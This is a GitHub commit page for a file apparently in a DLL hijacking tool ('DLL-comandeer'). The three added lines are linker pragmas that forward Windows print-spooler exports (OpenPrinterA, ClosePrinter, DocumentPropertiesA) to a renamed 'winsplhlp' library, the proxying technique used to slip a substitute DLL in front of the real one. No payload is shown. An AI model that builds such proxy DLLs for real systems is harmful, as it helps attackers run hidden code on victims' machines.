Skip to content

Commit 6e35697

Browse files
authored
Update windowsspool.cpp
1 parent f8e0d11 commit 6e35697

File tree

1 file changed

+3
-1
lines changed

1 file changed

+3
-1
lines changed

Client/DLL-comandeer/windowsspool.cpp

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,9 @@
66
Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
77
88
*/
9-
9+
#pragma comment(linker,"/export:OpenPrinterA=winsplhlp.OpenPrinterA,@143")
10+
#pragma comment(linker,"/export:ClosePrinter=winsplhlp.ClosePrinterA,@29")
11+
#pragma comment(linker,"/export:DocumentPropertiesA=winsplhlp.DocumentPropertiesA,@77")
1012

1113
#include <Windows.h>
1214

0 commit comments

Comments
 (0)